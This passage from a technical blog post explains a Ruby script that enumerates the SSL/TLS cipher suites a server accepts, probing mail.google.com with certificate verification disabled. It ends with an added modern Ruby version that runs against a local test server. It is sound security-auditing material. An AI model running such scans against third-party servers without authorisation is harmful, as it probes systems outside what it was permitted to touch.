["EXP-RC4-MD5", "SSLv2", 40, 128]<br />
]<br />
</span><br />
<strong>Line 7 and 8:</strong><br />
<span style="font-family: courier new;">request = Net::HTTP.new(target_url, port)</span><br />
<span style="font-family: courier new;">request.use_ssl = true</span><br />
Creates a new HTTP object and enables SSL for the connection.<br />
<strong>Line 9: </strong><br />
<span style="font-family: courier new;">request.set_context = version</span><br />
Sets the context of the current request to the protocol version provided. It is very important to set the right context when we want to restrict the cipher suites used; an example should make this clearer.<br />
<br />
Consider the following two code snippets and the corresponding packet captures in Wireshark. For the purpose of experimentation, a connection was initiated to mail.google.com and the "Client Hello" was observed in Wireshark for both snippets. The screenshots clearly show that when no context is provided, multiple cipher suites may be offered for a single cipher name. In this case, the "RC4-MD5" cipher suite exists in both TLSv1/SSLv3 and SSLv2. When the context is not set to SSLv2 or TLSv1/SSLv3, the "Client Hello" includes two cipher suites: one for TLSv1/SSLv3 and one for SSLv2. This results in incorrect enumeration.<br />
<br />
For example, certain websites may not allow SSLv2. When connection attempts are made with the "RC4-MD5" cipher without setting the proper context, the connection may still succeed because the "Client Hello" now also carries the SSLv3/TLSv1 cipher suite of the same name. <br />
<br />
# == SNIP 1 Begins ===<br />
<span style="font-family: courier new;">request = Net::HTTP.new("mail.google.com", 443)</span><br />
<span style="font-family: courier new;">request.use_ssl = true</span><br />
<strong><span style="font-family: courier new;">request.set_context = :SSLv2</span> </strong><br />
<span style="font-family: courier new;">request.verify_mode = OpenSSL::SSL::VERIFY_NONE</span><br />
<span style="font-family: courier new;">request.ciphers = "RC4-MD5"</span><br />
<span style="font-family: courier new;">response = request.get("/")</span><br />
# == SNIP 1 ENDS ===<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFwqkzHA8O03M6o-QGU7EqaM-gBmQDCbP7PPIy9QTW36o8IvTkaENEbfn06SStmeoIM0J3P2KJMcBZjSmBBvg8YFLR12pZw2S-ClH3cZogqG9Y7SCTXq0ra3Vp7kWA1XfqCfrcb1OC-eZ9/s1600-h/RC4-MD5_with_context.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5380562449913791714" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFwqkzHA8O03M6o-QGU7EqaM-gBmQDCbP7PPIy9QTW36o8IvTkaENEbfn06SStmeoIM0J3P2KJMcBZjSmBBvg8YFLR12pZw2S-ClH3cZogqG9Y7SCTXq0ra3Vp7kWA1XfqCfrcb1OC-eZ9/s320/RC4-MD5_with_context.png" style="cursor: hand; float: left; height: 147px; margin: 0px auto 10px; text-align: center; width: 320px;" /></a><br />
<br />
# == SNIP 2 Begins ===<br />
<span style="font-family: courier new;">request = Net::HTTP.new("mail.google.com", 443)</span><br />
<span style="font-family: courier new;">request.use_ssl = true</span><br />
<span style="font-family: courier new;">request.verify_mode = OpenSSL::SSL::VERIFY_NONE</span><br />
<span style="font-family: courier new;">request.ciphers = "RC4-MD5"</span><br />
<span style="font-family: courier new;">request.get("/")</span><br />
# == SNIP 2 Ends ===<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdvOGU3lV2JKrXz7SuVqLGKoAMgX_FlAg5Lnw3ZxZo5u97cmMU7hnRFLpKk4chPPKQVPpjCrl8wHWlF5Q_JLvTCh9_V5lccNAWXdJwTehIyh01GmWkF_G1NmiOkjms9gmwRPeu_QgbLPSn/s1600-h/RC4-MD5_without_context.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5380562978355659586" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdvOGU3lV2JKrXz7SuVqLGKoAMgX_FlAg5Lnw3ZxZo5u97cmMU7hnRFLpKk4chPPKQVPpjCrl8wHWlF5Q_JLvTCh9_V5lccNAWXdJwTehIyh01GmWkF_G1NmiOkjms9gmwRPeu_QgbLPSn/s320/RC4-MD5_without_context.png" style="cursor: hand; float: left; height: 147px; margin: 0px 10px 10px 0px; width: 320px;" /></a><br />
<br />
The only difference between Snip 1 and Snip 2 is the context assignment call, <strong>request.set_context = :SSLv2</strong>.<br />
<br />
<br />
<strong>Line 10:<br />
</strong><span style="font-family: courier new;">request.verify_mode = OpenSSL::SSL::VERIFY_NONE<br />
</span>Disables certificate verification. This is acceptable here because we only want to know whether the handshake completes with the offered cipher suite, not whether the certificate chain is trusted. <br />
<br />
<strong>Line 11:</strong><br />
<span style="font-family: courier new;">request.ciphers = cipher_name<br />
</span>Sets the request's cipher list to the single cipher suite provided.<br />
<br />
<strong>Line 12 to 17:</strong><br />
<span style="font-family: courier new;">begin<br />
response = request.get("/")<br />
puts "[+] Accepted\t #{bits} bits\t#{cipher_name}"<br />
rescue OpenSSL::SSL::SSLError => e<br />
puts "[-] Rejected\t #{bits} bits\t#{cipher_name}"<br />
rescue #Ignore all other Exceptions<br />
end</span><br />
<br />
Attempt a connection to the remote host and fetch the home page. An <strong>OpenSSL::SSL::SSLError</strong> exception is raised when the connection attempt fails because of a cipher suite mismatch; all other exceptions are ignored. Whether the request succeeds or raises this exception decides if the cipher suite was accepted or rejected.<br />
<br />
<br />
<br />
<strong>Putting it all together:<br />
</strong>===============================<br />
<span style="font-family: courier new;">require 'net/https'<br />
target_url = "mail.google.com" # Target website<br />
port = 443 # Target port<br />
protocol_versions = [:SSLv2, :SSLv3, :TLSv1] # Protocol versions to test<br />
<br />
module Net<br />
  class HTTP<br />
    def set_context=(value)<br />
      @ssl_context = OpenSSL::SSL::SSLContext.new # Create a new context<br />
      @ssl_context &&= OpenSSL::SSL::SSLContext.new(value) # Re-create it for the given protocol version<br />
    end<br />
    ssl_context_accessor :ciphers # Adds ciphers and ciphers= to Net::HTTP<br />
  end<br />
end<br />
<br />
protocol_versions.each do |version|<br />
  cipher_set = OpenSSL::SSL::SSLContext.new(version).ciphers # [name, version, bits, alg_bits] entries<br />
  puts "\n============================================"<br />
  puts version<br />
  puts "============================================"<br />
  cipher_set.each do |cipher_name, ignore_me_cipher_version, bits, ignore_me_algorithm_bits|<br />
    request = Net::HTTP.new(target_url, port)<br />
    request.use_ssl = true<br />
    request.set_context = version # Pin the protocol version<br />
    request.ciphers = cipher_name # Offer exactly one cipher suite<br />
    request.verify_mode = OpenSSL::SSL::VERIFY_NONE<br />
    begin<br />
      response = request.get("/")<br />
      puts "[+] Accepted\t #{bits} bits\t#{cipher_name}"<br />
    rescue OpenSSL::SSL::SSLError => e # Handshake failed: cipher suite not supported<br />
      puts "[-] Rejected\t #{bits} bits\t#{cipher_name}"<br />
    rescue # Ignore all other exceptions<br />
    end<br />
  end<br />
end</span><br />
<br />
<b>A Sample Run </b><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKfQeZO0mNE1g1u5sDiNaPJ8Y-FcGMRhY164Va8j-VzVrKR3l6zMUJ1oMxiagxzSKIPxHFHjt0YzP22Ky15uA7KgZjaXO4sTobpgVgIRAiXqQPSl2SuWmwG8gnbFoHvZrR0lW4gX8lLc1L/s1600-h/SSLEnum_Sample_Run.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5380566321625083106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKfQeZO0mNE1g1u5sDiNaPJ8Y-FcGMRhY164Va8j-VzVrKR3l6zMUJ1oMxiagxzSKIPxHFHjt0YzP22Ky15uA7KgZjaXO4sTobpgVgIRAiXqQPSl2SuWmwG8gnbFoHvZrR0lW4gX8lLc1L/s400/SSLEnum_Sample_Run.png" style="cursor: hand; height: 400px; margin: 0px auto 10px; text-align: center; width: 270px;" /></a><br />
<br />
Let me know if you have any queries or comments. Thanks for stopping by.<br />
<br />
<b><u>Edit: Sep 23, 2013</u></b><br />
<span style="font-size: large;">Ruby 1.9</span><br />
Ruby 1.9 handles SSL ciphers differently from 1.8. The corresponding code to modify the Ruby library is available in the code base of my free tool SSLSmart on <a href="https://github.com/gursev/sslsmart-1.0/blob/master/bin/sslsmartlib.rb">GitHub</a>.<br />
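The Net::HTTP monkey-patch above no longer applies to current Ruby, where the openssl library exposes the protocol version and the cipher list directly on an SSLContext. The following is an added example, not code from this post or from SSLSmart, that implements the same one-suite-per-handshake enumeration on the modern API and, so that it runs offline, points it at a throw-away TLS 1.2 server started in-process on 127.0.0.1 with a freshly generated self-signed certificate. The server's allowed cipher list (SERVER_CIPHERS), the certificate subject and all function names are constructed for this example. The rejection signal is the same OpenSSL::SSL::SSLError the post relies on; connection-level errors are reported separately so that an unreachable host is not mistaken for a rejected cipher.

```ruby
# Added example (not from the post or SSLSmart): one-cipher-per-handshake
# enumeration on the current Ruby openssl API, exercised against a local
# TLS 1.2 server so that it runs offline. Every name below is constructed.
require 'openssl'
require 'socket'

# Probe a single (protocol version, cipher suite) pair. The Client Hello
# then carries exactly one suite, and an OpenSSL::SSL::SSLError raised
# during the handshake is the same "rejected" signal the post relies on.
def probe_cipher(host, port, version, cipher_name)
  ctx = OpenSSL::SSL::SSLContext.new
  ctx.min_version = version           # pin the protocol version ...
  ctx.max_version = version
  ctx.ciphers = cipher_name           # ... and offer only this suite
  ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE  # only the handshake outcome matters here
  tcp = TCPSocket.new(host, port)
  ssl = OpenSSL::SSL::SSLSocket.new(tcp, ctx)
  ssl.connect
  negotiated = ssl.cipher[0]          # ssl.cipher => [name, version, bits, alg_bits]
  ssl.close
  [:accepted, negotiated]
rescue OpenSSL::SSL::SSLError => e
  [:rejected, e.message]              # handshake_failure / no shared cipher
rescue SystemCallError => e
  [:error, e.message]                 # e.g. connection refused: not a cipher verdict
ensure
  tcp.close if tcp && !tcp.closed?
end

# Throw-away self-signed certificate for the local server (constructed on the fly).
def make_self_signed_cert
  key = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial = 1
  cert.subject = OpenSSL::X509::Name.parse("/CN=localhost")
  cert.issuer = cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after = Time.now + 3600
  cert.sign(key, OpenSSL::Digest.new("SHA256"))
  [cert, key]
end

# Start a TLS 1.2-only server on 127.0.0.1 that accepts just `allowed_ciphers`.
# Returns [port, thread, stop_flag]; set stop_flag[:done] = true to shut it down.
def start_server(allowed_ciphers)
  cert, key = make_self_signed_cert
  ctx = OpenSSL::SSL::SSLContext.new
  ctx.cert = cert
  ctx.key = key
  ctx.min_version = OpenSSL::SSL::TLS1_2_VERSION
  ctx.max_version = OpenSSL::SSL::TLS1_2_VERSION
  ctx.ciphers = allowed_ciphers
  ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
  tcp = TCPServer.new("127.0.0.1", 0)  # port 0: let the OS pick a free port
  server = OpenSSL::SSL::SSLServer.new(tcp, ctx)
  stop = { done: false }
  thread = Thread.new do
    until stop[:done]
      next unless IO.select([tcp], nil, nil, 0.05)
      begin
        server.accept.close            # handshake completed: hang up, we have our answer
      rescue OpenSSL::SSL::SSLError, SystemCallError, IOError
        # no shared cipher: OpenSSL already sent the handshake_failure alert
      end
    end
    server.close
  end
  [tcp.addr[1], thread, stop]
end

# Enumerate every pre-TLS 1.3 suite the local OpenSSL build knows, one
# handshake each, and return { suite_name => :accepted | :rejected | :error }.
# TLS 1.3 suites are configured through SSLContext#ciphersuites=, so they are skipped.
def enumerate_ciphers(host, port, version = OpenSSL::SSL::TLS1_2_VERSION)
  candidates = OpenSSL::SSL::SSLContext.new.ciphers.reject { |c| c[1] == "TLSv1.3" }
  results = {}
  candidates.each do |name, _proto, bits, _alg_bits|
    status, _detail = probe_cipher(host, port, version, name)
    results[name] = status
    puts format("[%s] %-8s %4d bits  %s", status == :accepted ? "+" : "-", status, bits, name)
  end
  results
end

# Constructed server policy: only two ECDHE-RSA AEAD suites are allowed.
SERVER_CIPHERS = "ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384".freeze

# Bring the local server up, enumerate against it, tear it down.
def run_demo
  port, thread, stop = start_server(SERVER_CIPHERS)
  enumerate_ciphers("127.0.0.1", port)
ensure
  stop[:done] = true if stop
  thread.join if thread
end

run_demo if $PROGRAM_NAME == __FILE__
```

Against a real server you would call enumerate_ciphers with its host and port and loop over the protocol versions you care about (OpenSSL::SSL::TLS1_VERSION, TLS1_1_VERSION, TLS1_2_VERSION), just as the post loops over protocol_versions; the in-process server only exists so the example has something to talk to. Pinning min_version and max_version to the same value is the modern equivalent of the post's set_context= call, and it matters for the same reason: without it the Client Hello may advertise more than the one suite and version you think you are testing.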
<div>
<br /></div>
</div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com4